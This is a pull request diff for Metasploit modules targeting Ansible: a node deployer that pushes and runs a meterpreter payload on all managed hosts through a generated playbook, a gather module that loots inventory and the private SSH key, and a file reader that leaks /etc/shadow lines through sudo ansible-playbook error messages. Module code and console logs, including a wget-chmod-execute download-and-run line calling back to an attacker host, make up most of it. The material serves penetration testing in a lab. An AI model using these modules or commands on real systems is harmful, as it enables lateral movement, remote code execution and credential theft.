### PR TITLE
Ansible: post gather module, payload deployer, and file reader

### DIFF
--- a/documentation/modules/exploit/linux/local/ansible_node_deployer.md
+++ b/documentation/modules/exploit/linux/local/ansible_node_deployer.md
@@ -1,7 +1,7 @@
 ## Vulnerable Application
 
 This exploit module creates an ansible module for deployment to nodes in the network.
-It creates a new yaml playbook which copys our payload, chmods it, then runs it on all
+It creates a new yaml playbook which copies our payload, chmods it, then runs it on all
 targets which have been selected (default all).
 
 ### Docker-compose Install

--- a/documentation/modules/exploit/linux/local/ansible_node_deployer.md
+++ b/documentation/modules/exploit/linux/local/ansible_node_deployer.md
@@ -1,0 +1,188 @@
+## Vulnerable Application
+
+This exploit module creates an ansible module for deployment to nodes in the network.
+It creates a new yaml playbook which copys our payload, chmods it, then runs it on all
+targets which have been selected (default all).
+
+### Docker-compose Install
+
+Use the ansible lab files located [here](https://github.com/abdennour/ansible-lab-environment-in-containers).
+
+Before bringing up the `docker-compose` instance, you'll want to generate an SSH key: `ssh-keygen -t rsa -N "" -f secrets/id_rsa`
+
+Of note, only 1 of the 3 alpine hosts will be successful due to the port conflict. This is fine though.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Get an initial shell on the box
+1. Do: `use exploit/linux/local/ansible_node_deployer`
+1. Do: `set session [#]`
+1. Do: `run`
+1. You should get sessions on all the targeted hosts
+
+## Options
+
+### ANSIBLEPLAYBOOK
+
+Location of ansible executable if not in a standard location. This is added to a list of default locations
+which includes `/usr/local/bin/ansible`. Defaults to ``
+
+## WritableDir
+
+A directory on the compromised host we can write our payload to. Defaults to `/tmp`
+
+## TargetWritableDir
+
+A directory on the target hosts we can write our payload to. Defaults to `/tmp`
+
+## CALCULATE
+
+This will calculate how many hosts may be exploitable by using Ansible's ping command.
+
+### HOSTS
+
+Which Ansible host (groups) to target. Defaults to `all`
+
+### ListenerTimeout
+
+How many seconds to wait after executing the payload for hosts to call back. Defaults to `60`
+
+## Scenarios
+
+### Docker compose as mentioned above
+
+Get initial access to the system
+
+```
+resource (ansible_deploy.rb)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (ansible_deploy.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (ansible_deploy.rb)> set srvport 8181
+srvport => 8181
+resource (ansible_deploy.rb)> set target 7
+target => 7
+resource (ansible_deploy.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (ansible_deploy.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1:8181/2BQIMgeywC6gGt9
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO OHZQobFE --no-check-certificate http://1.1.1.1:8181/2BQIMgeywC6gGt9; chmod +x OHZQobFE; ./OHZQobFE& disown
+[*] 172.22.0.7       web_delivery - Delivering Payload (250 bytes)
+[*] Sending stage (3045380 bytes) to 172.22.0.7
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.22.0.7:49612) at 2023-12-15 20:12:27 -0500
+```
+
+```
+resource (ansible_deploy.rb)> use exploit/linux/local/ansible_node_deployer
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+resource (ansible_deploy.rb)> set session 1
+session => 1
+resource (ansible_deploy.rb)> set verbose true
+verbose => true
+resource (ansible_deploy.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (ansible_deploy.rb)> set lport 9999
+lport => 9999
+[*] Starting persistent handler(s)...
+[msf](Jobs:1 Agents:0) exploit(linux/local/ansible_node_deployer) > 
+[msf](Jobs:1 Agents:1) exploit(linux/local/ansible_node_deployer) > set TargetWritableDir /etc/
+TargetWritableDir => /etc/
+[msf](Jobs:1 Agents:1) exploit(linux/local/ansible_node_deployer) > exploit
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+[msf](Jobs:2 Agents:1) exploit(linux/local/ansible_node_deployer) > 
+[*] Started reverse TCP handler on 1.1.1.1:9999 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] /tmp is writable, and ansible executable found
+[+] The target is vulnerable.
+[+] Stored pings to: /root/.msf4/loot/20231215201340_default_172.22.0.7_ansible.ping_422232.txt
+[+] Ansible Pings
+=============
+
+ Host                       Status   Ping  Changed
+ ----                       ------   ----  -------
+ alpine-example-com         SUCCESS  pong  false
+ alpinesystemd-example-com  SUCCESS  pong  false
+ centos7-example-com        SUCCESS  pong  false
+ rhel8-example-com          SUCCESS  pong  false
+
+[+] 4 ansible hosts were pingable, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.
+[*] Creating yaml job to execute
+[*] Writing payload
+[*] Writing '/tmp/O514h2N' (250 bytes) ...
+[*] Executing ansible job
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.22.0.6
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.22.0.4
+[+] Stored run logs to: /root/.msf4/loot/20231215201411_default_172.22.0.7_ansible.playbook_967421.txt
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.22.0.5
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.22.0.2
+[*] Meterpreter session 2 opened (1.1.1.1:9999 -> 172.22.0.6:60850) at 2023-12-15 20:14:36 -0500
+[*] Meterpreter session 5 opened (1.1.1.1:9999 -> 172.22.0.2:34980) at 2023-12-15 20:14:36 -0500
+[*] Meterpreter session 3 opened (1.1.1.1:9999 -> 172.22.0.4:51082) at 2023-12-15 20:14:46 -0500
+[*] Meterpreter session 4 opened (1.1.1.1:9999 -> 172.22.0.5:41770) at 2023-12-15 20:14:56 -0500
+
+[msf](Jobs:2 Agents:5) exploit(linux/local/ansible_node_deployer) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information        Connection
+  --  ----  ----                   -----------        ----------
+  1         meterpreter x64/linux  root @ 172.22.0.7  1.1.1.1:4444 -> 172.22.0.7:49612 (172.22.0.7)
+  2         meterpreter x64/linux  root @ 172.22.0.6  1.1.1.1:9999 -> 172.22.0.6:60850 (172.22.0.6)
+  3         meterpreter x64/linux  root @ 172.22.0.4  1.1.1.1:9999 -> 172.22.0.4:51082 (172.22.0.4)
+  4         meterpreter x64/linux  root @ 172.22.0.5  1.1.1.1:9999 -> 172.22.0.5:41770 (172.22.0.5)
+  5         meterpreter x64/linux  root @ 172.22.0.2  1.1.1.1:9999 -> 172.22.0.2:34980 (172.22.0.7)
+```
+
+```
+└─$ cat ~/.msf4/loot/20231215201411_default_172.22.0.7_ansible.playbook_967421.txt
+
+PLAY [Deliver Meterpreter] *****************************************************
+
+TASK [Gathering Facts] *********************************************************
+[DEPRECATION WARNING]: Distribution redhat 8.2 on host rhel8-example-com should
+ use /usr/libexec/platform-python, but is using /usr/bin/python for backward 
+compatibility with prior Ansible releases. A future Ansible release will 
+default to using the discovered platform python for this host. See https://docs
+.ansible.com/ansible/2.9/reference_appendices/interpreter_discovery.html for 
+more information. This feature will be removed in version 2.12. Deprecation 
+warnings can be disabled by setting deprecation_warnings=False in ansible.cfg.
+ok: [rhel8-example-com]
+ok: [centos7-example-com]
+[WARNING]: Platform linux on host alpine-example-com is using the discovered
+Python interpreter at /usr/bin/python, but future installation of another
+Python interpreter could change this. See https://docs.ansible.com/ansible/2.9/
+reference_appendices/interpreter_discovery.html for more information.
+ok: [alpine-example-com]
+[WARNING]: Platform linux on host alpinesystemd-example-com is using the
+discovered Python interpreter at /usr/bin/python, but future installation of
+another Python interpreter could change this. See https://docs.ansible.com/ansi
+ble/2.9/reference_appendices/interpreter_discovery.html for more information.
+ok: [alpinesystemd-example-com]
+
+TASK [ansible.builtin.copy] ****************************************************
+changed: [alpine-example-com]
+changed: [centos7-example-com]
+changed: [rhel8-example-com]
+changed: [alpinesystemd-example-com]
+
+TASK [ansible.builtin.file] ****************************************************
+changed: [alpine-example-com]
+changed: [rhel8-example-com]
+changed: [centos7-example-com]
+changed: [alpinesystemd-example-com]
+
+TASK [command] ***************************************************************** 
+```

--- a/documentation/modules/exploit/linux/local/ansible_node_deployer.md
+++ b/documentation/modules/exploit/linux/local/ansible_node_deployer.md
@@ -29,15 +29,15 @@ Of note, only 1 of the 3 alpine hosts will be successful due to the port conflic
 Location of ansible executable if not in a standard location. This is added to a list of default locations
 which includes `/usr/local/bin/ansible`. Defaults to ``
 
-## WritableDir
+### WritableDir
 
 A directory on the compromised host we can write our payload to. Defaults to `/tmp`
 
-## TargetWritableDir
+### TargetWritableDir
 
 A directory on the target hosts we can write our payload to. Defaults to `/tmp`
 
-## CALCULATE
+### CALCULATE
 
 This will calculate how many hosts may be exploitable by using Ansible's ping command.
 
@@ -47,7 +47,8 @@ Which Ansible host (groups) to target. Defaults to `all`
 
 ### ListenerTimeout
 
-How many seconds to wait after executing the payload for hosts to call back. Defaults to `60`
+How many seconds to wait after executing the payload for hosts to call back.
+If set to `0`, wait forever. Defaults to `60`
 
 ## Scenarios
 

--- a/documentation/modules/post/linux/gather/ansible.md
+++ b/documentation/modules/post/linux/gather/ansible.md
@@ -1,0 +1,111 @@
+## Vulnerable Application
+
+This module will grab ansible information including hosts, ping status, and the configuration file.
+
+### Docker-compose Install
+
+Use the ansible lab files located [here](https://github.com/abdennour/ansible-lab-environment-in-containers).
+
+Before bringing up the `docker-compose` instance, you'll want to generate an SSH key: `ssh-keygen -t rsa -N "" -f secrets/id_rsa`
+
+Of note, only 1 of the 3 alpine hosts will be successful due to the port conflict. This is fine though.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Get an initial shell on the box
+1. Do: `use post/linux/gather/ansible`
+1. Do: `set session [#]`
+1. Do: `run`
+1. You should get information about the ansible install and host.
+
+## Options
+
+### ANSIBLE
+
+Location of ansible executable if not in a standard location. This is added to a list of default locations
+which includes `/usr/local/bin/ansible`. Defaults to ``
+
+### ANSIBLEINVENTORY
+
+Location of ansible-inventory executable if not in a standard location. This is added to a list of default locations
+which includes `/usr/local/bin/ansible-inventory`. Defaults to ``
+
+### ANSIBLECFG
+
+Location of ansible-inventory executable if not in a standard location. This is added to a list of default locations
+which includes `/etc/ansible/ansible.cfg`. Defaults to ``
+
+### HOSTS
+
+Which Ansible host (groups) to target. Defaults to `all`
+
+## Scenarios
+
+### Docker compose as mentioned above
+
+Get initial access to the system
+
+```
+resource (ansible.rb)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (ansible.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (ansible.rb)> set srvport 8181
+srvport => 8181
+resource (ansible.rb)> set target 7
+target => 7
+resource (ansible.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (ansible.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1:8181/qsmOaSn61Y
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO D418BdOM --no-check-certificate http://1.1.1.1:8181/qsmOaSn61Y; chmod +x D418BdOM; ./D418BdOM& disown
+[*] Starting persistent handler(s)...
+[*] Sending stage (3045380 bytes) to 172.28.0.3
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.28.0.3:52506) at 2023-12-13 12:32:03 -0500
+```
+
+
+```
+resource (ansible.rb)> use post/linux/gather/ansible
+resource (ansible.rb)> set ANSIBLECFG /playbook/ansible.cfg
+ANSIBLECFG => /playbook/ansible.cfg
+resource (ansible.rb)> set session 1
+session => 1
+resource (ansible.rb)> set verbose true
+verbose => true
+[msf](Jobs:1 Agents:2) post(linux/gather/ansible) > run
+
+[+] Stored inventory to: /root/.msf4/loot/20231213123519_default_172.28.0.3_ansible.inventor_801476.json
+[+] Ansible Hosts
+=============
+
+ Host                       Connection
+ ----                       ----------
+ alpine-example-com         ssh
+ alpinesystemd-example-com  docker
+ centos7-example-com        docker
+ rhel8-example-com          docker
+
+[+] Stored pings to: /root/.msf4/loot/20231213123529_default_172.28.0.3_ansible.ping_007951.txt
+[+] Ansible Pings
+=============
+
+ Host                       Status   Ping  Changed
+ ----                       ------   ----  -------
+ alpine-example-com         SUCCESS  pong  false
+ alpinesystemd-example-com  SUCCESS  pong  false
+ centos7-example-com        SUCCESS  pong  false
+ rhel8-example-com          SUCCESS  pong  false
+
+[+] Stored config to: /root/.msf4/loot/20231213123530_default_172.28.0.3_ansible.cfg_563982.txt
+[+] Private key file location: /secrets/id_rsa
+[+] Stored private key file to: /root/.msf4/loot/20231213123530_default_172.28.0.3_ansible.private._084820.txt
+[*] Post module execution completed
+```

--- a/documentation/modules/post/linux/gather/ansible_playbook_error_message_file_reader.md
+++ b/documentation/modules/post/linux/gather/ansible_playbook_error_message_file_reader.md
@@ -1,0 +1,105 @@
+## Vulnerable Application
+
+This module will read the first line of a file based on an error message from ansible-playbook with sudo privileges.
+ansible-playbook takes a yaml file as input, and if there is an error, such as a non-yaml file, it outputs the line
+where the error occurs. This can be exploited to read the first line of the file, which we'll typically want to read
+/etc/shadow to obtain root's hash.
+
+### Docker-compose Install
+
+Use the ansible lab files located [here](https://github.com/abdennour/ansible-lab-environment-in-containers).
+
+Before bringing up the `docker-compose` instance, you'll want to generate an SSH key: `ssh-keygen -t rsa -N "" -f secrets/id_rsa`
+
+Of note, only 1 of the 3 alpine hosts will be successful due to the port conflict. This is fine though.
+
+Next you'll need to add a user:
+
+```
+docker exec -it ansible-lab-environment-in-containers_controlnode_1 /bin/sh
+useradd user
+chmod o+w /etc/sudoers
+echo -ne "\nuser ALL=(ALL) NOPASSWD: /usr/local/bin/ansible-playbook *\n" >> /etc/sudoers
+chmod o-w /etc/sudoers
+```
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Get an initial shell on the box
+1. Do: `use post/linux/gather/ansible_playbook_error_message_file_reader`
+1. Do: `set session [#]`
+1. Do: `run`
+1. You should be able to read the top line of a file.
+
+## Options
+
+### ANSIBLEPLAYBOOK
+
+Location of ansible-playbook executable if not in a standard location. This is added to a list of default locations
+which includes `/usr/local/bin/ansible-playbook`, `/usr/bin/ansible-playbook`. Defaults to ``
+
+### FILE
+
+File to be read. Defaults to `/etc/shadow`
+
+## Scenarios
+
+### Docker compose as mentioned above
+
+Get initial access to the system
+
+```
+resource (ansible_playbook.rb)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (ansible_playbook.rb)> set lhost 192.168.2.128
+lhost => 192.168.2.128
+resource (ansible_playbook.rb)> set srvport 8181
+srvport => 8181
+resource (ansible_playbook.rb)> set lport 8183
+lport => 8183
+resource (ansible_playbook.rb)> set target 7
+target => 7
+resource (ansible_playbook.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (ansible_playbook.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.2.128:8183 
+
+[*] Using URL: http://192.168.2.128:8181/I5062GM5P5Avgu
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO lAM5H81x --no-check-certificate http://192.168.2.128:8181/I5062GM5P5Avgu; chmod +x lAM5H81x; ./lAM5H81x& disown
+
+[*] Starting persistent handler(s)...
+[*] 172.28.0.3       web_delivery - Delivering Payload (250 bytes)
+[*] Sending stage (3045380 bytes) to 172.28.0.3
+[*] Meterpreter session 1 opened (192.168.2.128:8183 -> 172.28.0.3:37216) at 2023-12-13 14:58:36 -0500
+[msf](Jobs:1 Agents:1) post(linux/gather/ansible_playbook_error_message_file_reader) > sessions -i 1
+[*] Starting interaction with 1...
+
+(Meterpreter 1)(/playbook) > getuid
+Server username: user
+(Meterpreter 1)(/playbook) > cat /etc/shadow
+[-] core_channel_open: Operation failed: 1
+(Meterpreter 1)(/playbook) > background
+[*] Backgrounding session 1...
+```
+
+```
+resource (ansible_playbook.rb)> use post/linux/gather/ansible_playbook_error_message_file_reader
+resource (ansible_playbook.rb)> set session 1
+session => 1
+resource (ansible_playbook.rb)> set verbose true
+verbose => true
+[msf](Jobs:1 Agents:1) post(linux/gather/ansible_playbook_error_message_file_reader) > run
+
+[*] Checking sudo
+[*] Executing: sudo -n -l
+[*] Executing: sudo -n /usr/local/bin/ansible-playbook /etc/shadow
+[+] root:!::0:::::
+[*] Post module execution completed
+```

--- a/documentation/modules/post/linux/gather/ansible_playbook_error_message_file_reader.md
+++ b/documentation/modules/post/linux/gather/ansible_playbook_error_message_file_reader.md
@@ -44,6 +44,10 @@ which includes `/usr/local/bin/ansible-playbook`, `/usr/bin/ansible-playbook`. D
 
 File to be read. Defaults to `/etc/shadow`
 
+### FULLOUTPUT
+
+If the entire command output should be displayed, or only the error line. Defaults to `false`
+
 ## Scenarios
 
 ### Docker compose as mentioned above

--- a/lib/msf/core/exploit/local/ansible.rb
+++ b/lib/msf/core/exploit/local/ansible.rb
@@ -74,10 +74,11 @@ module Msf
       return @ansible if @ansible
 
       [suggestion, '/usr/local/bin/ansible'].each do |exec|
-        next if exec.nil? || exec.empty?
+        next if exec.blank?
         next unless executable?(exec)
 
         @ansible = exec
+        return @ansible
       end
       @ansible
     end

--- a/lib/msf/core/exploit/local/ansible.rb
+++ b/lib/msf/core/exploit/local/ansible.rb
@@ -1,0 +1,80 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Exploit::Local::Ansible
+    def initialize(info = {})
+      super
+
+      register_advanced_options([
+        Msf::OptString.new('ANSIBLE', [true, 'Ansible executable location', '']),
+        Msf::OptString.new('ANSIBLEPLAYBOOK', [true, 'Ansible-playbook executable location', '']),
+      ])
+    end
+
+    #
+    # Uses the ansible command to ping hosts, returns an array of hashes
+    #
+    # @param ansible_exe [String] The name location of the ansible executable
+    # @param hosts [String] The host string to use, defaults to 'all'
+    # @return [Array] containing a hash for each host. Each has consists of the
+    #  following parameters: host, status, ping, changed
+    #
+    def ping_hosts(ansible_exe = datastore['ANSIBLE'], hosts = 'all')
+      results = cmd_exec("#{ansible_exe} #{hosts} -m ping -o")
+      # here's a regex with test: https://rubular.com/r/FMHhWx8QlVnidA
+      regex = /(\S+)\s+\|\s+([A-Z]+)\s+=>\s+({.+})$/
+      matches = results.scan(regex)
+
+      hosts = []
+      matches.each do |match|
+        match[2] = JSON.parse(match[2])
+        hosts << { 'host' => match[0], 'status' => match[1], 'ping' => match[2]['ping'], 'changed' => match[2]['changed'] }
+      end
+      hosts
+    end
+
+    #
+    # Attempts to find the ansible-playbook executable. Verifies the
+    # executable is executable by the user as well. Defaults to looking in
+    # standard locations for Ubuntu and Docker:
+    # ('/usr/local/bin/ansible-playbook', '/usr/bin/ansible-playbook')
+    #
+    # @param suggestion [String] The location of the ansible-playbook executable if
+    #  not in a standard location
+    # @return [String, nil] The executable location or nil if not found
+    #
+    def ansible_playbook_exe(suggestion = datastore['ANSIBLEPLAYBOOK'])
+      return @ansible_playbook if @ansible_playbook
+
+      [suggestion, '/usr/local/bin/ansible-playbook', '/usr/bin/ansible-playbook'].each do |exec|
+        next if exec.nil? || exec.empty?
+        next unless executable?(exec)
+
+        @ansible_playbook = exec
+      end
+      @ansible_playbook
+    end
+
+    #
+    # Attempts to find the ansible executable. Verifies the
+    # executable is executable by the user as well. Defaults to looking in
+    # standard locations for Ubuntu and Docker:
+    # ('/usr/local/bin/ansible')
+    #
+    # @param suggestion [String] The location of the ansible executable if
+    #  not in a standard location
+    # @return [String, nil] The executable location or nil if not found
+    #
+    def ansible_exe(suggestion = datastore['ANSIBLE'])
+      return @ansible if @ansible
+
+      [suggestion, '/usr/local/bin/ansible'].each do |exec|
+        next if exec.nil? || exec.empty?
+        next unless executable?(exec)
+
+        @ansible = exec
+      end
+      @ansible
+    end
+  end
+end

--- a/lib/msf/core/exploit/local/ansible.rb
+++ b/lib/msf/core/exploit/local/ansible.rb
@@ -16,8 +16,9 @@ module Msf
     #
     # @param ansible_exe [String] The name location of the ansible executable
     # @param hosts [String] The host string to use, defaults to 'all'
-    # @return [Array] containing a hash for each host. Each has consists of the
-    #  following parameters: host, status, ping, changed
+    # @return [Array, nil] containing a hash for each host. Each has consists of the
+    #  following parameters: host, status, ping, changed.
+    #  nil on error.
     #
     def ping_hosts(ansible_exe = datastore['ANSIBLE'], hosts = 'all')
       results = cmd_exec("#{ansible_exe} #{hosts} -m ping -o")
@@ -27,8 +28,11 @@ module Msf
 
       hosts = []
       matches.each do |match|
-        match[2] = JSON.parse(match[2])
-        hosts << { 'host' => match[0], 'status' => match[1], 'ping' => match[2]['ping'], 'changed' => match[2]['changed'] }
+        begin
+          match[2] = JSON.parse(match[2])
+          hosts << { 'host' => match[0], 'status' => match[1], 'ping' => match[2]['ping'], 'changed' => match[2]['changed'] }
+        rescue JSON::ParserError
+          return nil
       end
       hosts
     end
@@ -47,10 +51,11 @@ module Msf
       return @ansible_playbook if @ansible_playbook
 
       [suggestion, '/usr/local/bin/ansible-playbook', '/usr/bin/ansible-playbook'].each do |exec|
-        next if exec.nil? || exec.empty?
+        next if exec.blank?
         next unless executable?(exec)
 
         @ansible_playbook = exec
+        return @ansible_playbook
       end
       @ansible_playbook
     end

--- a/lib/msf/core/exploit/local/ansible.rb
+++ b/lib/msf/core/exploit/local/ansible.rb
@@ -6,8 +6,8 @@ module Msf
       super
 
       register_advanced_options([
-        Msf::OptString.new('ANSIBLE', [true, 'Ansible executable location', '']),
-        Msf::OptString.new('ANSIBLEPLAYBOOK', [true, 'Ansible-playbook executable location', '']),
+        Msf::OptString.new('ANSIBLE', [false, 'Ansible executable location', '']),
+        Msf::OptString.new('ANSIBLEPLAYBOOK', [false, 'Ansible-playbook executable location', '']),
       ])
     end
 
@@ -20,7 +20,7 @@ module Msf
     #  following parameters: host, status, ping, changed.
     #  nil on error.
     #
-    def ping_hosts(ansible_exe = datastore['ANSIBLE'], hosts = 'all')
+    def ping_hosts(hosts = 'all')
       results = cmd_exec("#{ansible_exe} #{hosts} -m ping -o")
       # here's a regex with test: https://rubular.com/r/FMHhWx8QlVnidA
       regex = /(\S+)\s+\|\s+([A-Z]+)\s+=>\s+({.+})$/
@@ -28,11 +28,10 @@ module Msf
 
       hosts = []
       matches.each do |match|
-        begin
-          match[2] = JSON.parse(match[2])
-          hosts << { 'host' => match[0], 'status' => match[1], 'ping' => match[2]['ping'], 'changed' => match[2]['changed'] }
-        rescue JSON::ParserError
-          return nil
+        match[2] = JSON.parse(match[2])
+        hosts << { 'host' => match[0], 'status' => match[1], 'ping' => match[2]['ping'], 'changed' => match[2]['changed'] }
+      rescue JSON::ParserError
+        return nil
       end
       hosts
     end
@@ -51,7 +50,7 @@ module Msf
       return @ansible_playbook if @ansible_playbook
 
       [suggestion, '/usr/local/bin/ansible-playbook', '/usr/bin/ansible-playbook'].each do |exec|
-        next if exec.blank?
+        next if exec.nil? || exec.blank?
         next unless executable?(exec)
 
         @ansible_playbook = exec
@@ -74,7 +73,7 @@ module Msf
       return @ansible if @ansible
 
       [suggestion, '/usr/local/bin/ansible'].each do |exec|
-        next if exec.blank?
+        next if exec.nil? || exec.blank?
         next unless executable?(exec)
 
         @ansible = exec

--- a/modules/exploits/linux/local/ansible_node_deployer.rb
+++ b/modules/exploits/linux/local/ansible_node_deployer.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::Local::Ansible
 
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -48,38 +49,12 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
     register_options [
-      OptString.new('ANSIBLE', [true, 'Ansible executable location', '']),
-      OptString.new('ANSIBLEPLAYBOOK', [true, 'Ansible-playbook executable location', '']),
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
       OptString.new('HOSTS', [ true, 'Which ansible hosts to target', 'all' ]),
       OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]),
       OptString.new('TargetWritableDir', [ true, 'A directory where we can write files on targets', '/tmp' ]),
       OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions', 60 ])
     ]
-  end
-
-  def ansible_exe
-    return @ansible if @ansible
-
-    ['/usr/local/bin/ansible', datastore['ANSIBLE']].each do |exec|
-      next unless file?(exec)
-      next unless executable?(exec)
-
-      @ansible = exec
-    end
-    @ansible
-  end
-
-  def ansible_playbook
-    return @ansible_playbook if @ansible_playbook
-
-    ['/usr/local/bin/ansible-playbook', '/usr/bin/ansible-playbook', datastore['ANSIBLEPLAYBOOK']].each do |exec|
-      next unless file?(exec)
-      next unless executable?(exec)
-
-      @ansible_playbook = exec
-    end
-    @ansible_playbook
   end
 
   def module_contents(payload_name)
@@ -100,31 +75,29 @@ class MetasploitModule < Msf::Exploit::Local
         mode: '0700'
     - name: 3
       command: #{datastore['TargetWritableDir']}/#{payload_name}
+    - name: 4
+      file:
+        path: #{datastore['TargetWritableDir']}/#{payload_name}
+        state: absent
 "
   end
 
   def check
-    return CheckCode::Safe('Ansible does not seem to be installed, unable to find ansible executable') if ansible_playbook.nil?
+    return CheckCode::Safe('Ansible does not seem to be installed, unable to find ansible executable') if ansible_playbook_exe.nil?
 
     CheckCode::Vulnerable('ansible executable found')
   end
 
-  def ping_hosts
-    results = cmd_exec("#{ansible_exe} #{datastore['HOSTS']} -m ping -o")
-    pings = store_loot('ansible.ping', 'text/plain', session, results, 'ansible.ping', 'Ansible ping status')
-    print_good("Stored pings to: #{pings}")
+  def ping_hosts_print
+    results = ping_hosts
 
     columns = ['Host', 'Status', 'Ping', 'Changed']
     table = Rex::Text::Table.new('Header' => 'Ansible Pings', 'Indent' => 1, 'Columns' => columns)
-    # here's a regex with test: https://rubular.com/r/FMHhWx8QlVnidA
-    regex = /(\S+)\s+\|\s+([A-Z]+)\s+=>\s+({.+})$/
-    matches = results.scan(regex)
 
     count = 0
-    matches.each do |match|
-      match[2] = JSON.parse(match[2])
-      table << [match[0], match[1], match[2]['ping'], match[2]['changed']]
-      count += 1 if match[2]['ping'] == 'pong'
+    results.each do |match|
+      table << [match['host'], match['status'], match['ping'], match['changed']]
+      count += 1 if match['ping'] == 'pong'
     end
     print_good(table.to_s) unless table.rows.empty?
     # give the user a few seconds to cancel if its too many etc
@@ -135,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     # Make sure we can write our exploit and payload to the local system
     fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir']
-    ping_hosts if datastore['CALCULATE']
+    ping_hosts_print if datastore['CALCULATE']
 
     payload_name = rand_text_alphanumeric(5..10)
     module_name = rand_text_alphanumeric(5..10)
@@ -146,9 +119,9 @@ class MetasploitModule < Msf::Exploit::Local
     register_file_for_cleanup(yaml_file)
     print_status('Writing payload')
     upload_and_chmodx "#{datastore['WritableDir']}/#{payload_name}", generate_payload_exe
-    register_file_for_cleanup("#{datastore['WritableDir']}/#{payload_name}")
+    register_file_for_cleanup("#{datastore['WritableDir']}/#{payload_name}") # cleanup payload on host, not targets
     print_status('Executing ansible job')
-    resp = cmd_exec("#{ansible_playbook} #{yaml_file}")
+    resp = cmd_exec("#{ansible_playbook_exe} #{yaml_file}")
     playbook_log = store_loot('ansible.playbook.log', 'text/plain', session, resp, 'ansible.playbook.log', 'Ansible playbook log')
     print_good("Stored run logs to: #{playbook_log}")
     # stolen from exploit/multi/handler
@@ -158,19 +131,6 @@ class MetasploitModule < Msf::Exploit::Local
       break if timeout > 0 && (stime + timeout < Time.now.to_f)
 
       Rex::ThreadSafe.sleep(1)
-    end
-  end
-
-  def on_new_session(_session)
-    super
-    cli.core.use('stdapi') if !cli.ext.aliases.include?('stdapi')
-
-    begin
-      print_warning("Deleting: #{datastore['TargetWritableDir']}/#{payload_name}")
-      cli.fs.file.rm("#{datastore['TargetWritableDir']}/#{payload_name}")
-      print_good("#{datastore['TargetWritableDir']}/#{payload_name} removed")
-    rescue StandardError
-      print_error("Unable to delete: #{datastore['TargetWritableDir']}/#{payload_name}")
     end
   end
 

--- a/modules/exploits/linux/local/ansible_node_deployer.rb
+++ b/modules/exploits/linux/local/ansible_node_deployer.rb
@@ -90,6 +90,10 @@ class MetasploitModule < Msf::Exploit::Local
 
   def ping_hosts_print
     results = ping_hosts
+    if results.nil?
+      print_error('Unable to parse ping hosts results')
+      return
+    end
 
     columns = ['Host', 'Status', 'Ping', 'Changed']
     table = Rex::Text::Table.new('Header' => 'Ansible Pings', 'Indent' => 1, 'Columns' => columns)

--- a/modules/exploits/linux/local/ansible_node_deployer.rb
+++ b/modules/exploits/linux/local/ansible_node_deployer.rb
@@ -1,0 +1,179 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ansible Agent Payload Deployer',
+        'Description' => %q{
+          This exploit module creates an ansible module for deployment to nodes in the network.
+          It creates a new yaml playbook which copys our payload, chmods it, then runs it on all
+          targets which have been selected (default all).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'n0tty' # original PoC, analysis
+        ],
